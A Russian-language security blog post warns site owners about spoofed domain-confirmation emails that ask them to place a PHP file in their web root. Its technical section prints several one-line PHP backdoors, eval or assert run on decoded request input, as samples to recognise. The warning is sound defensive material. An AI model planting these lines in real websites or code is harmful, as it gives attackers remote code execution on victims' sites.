Security Blog
Security Blog

Не доверяйте эти электронные подтверждения поддельные домена

Если вы когда-либо получаете письмо любого рода, в котором предлагается создать, загрузить или установить какой-либо код PHP на вашем сайте, вы должны его игнорировать


English version: Do not trust those fake domain confirmation emails


Недавно некоторые из моих клиентов получили странные электронные письма от регистраторов своих доменов. Эти письма содержат запрос подтверждения доменов своими собственными. Я проверил одно из этих писем и быстро опознал его как мошенническое письмо . Все буквы имеют одинаковый шаблон и запрос на создание файла PHP в корневой папке на веб-сайте с определенным именем и заданным содержимым. Само собой разумеется, что предлагаемый контент для этого файла PHP содержит вредоносный код, известный как бэкдор-код. Этот код позволяет злоумышленнику выполнить любое действие на веб-сайте жертвы.

Если вы когда-либо получаете письмо любого рода, в котором предлагается создать, загрузить или установить какой-либо код PHP на вашем веб-сайте, вы должны его игнорировать. Без исключений. Даже если письмо приходит от президента или твоей мамы.

Мошеннические письма кажутся законными из-за законного адреса электронной почты . Но это подделка электронной почты. Вы не ожидаете получить поддельное письмо от ваших друзей или регистратора вашего домена. Правильно? Нет! Любое электронное письмо может содержать любой адрес электронной почты. Подавляющее большинство почтовых серверов и почтовых клиентов не проверяют и не проверяют адрес отправителя. Итак, вы видите это как хотел хакер. Вы не должны доверять любому письму, полученному от известного отправителя, если в письме содержится запрос о каких-либо подозрительных действиях, таких как установка кода на вашем веб-сайте или в приложении на вашем компьютере.

Технические детали

Поддельные электронные письма обычно содержат некоторые из следующих строк PHP.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

К вашему сведению: base64_decode, eval и assert являются хорошо известными маркерами подозрительного или вредоносного кода PHP.

Смотрите также: Plugin Inspector выявляет проблемы безопасности с другими плагинами


I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.

View Comments
There are currently no comments.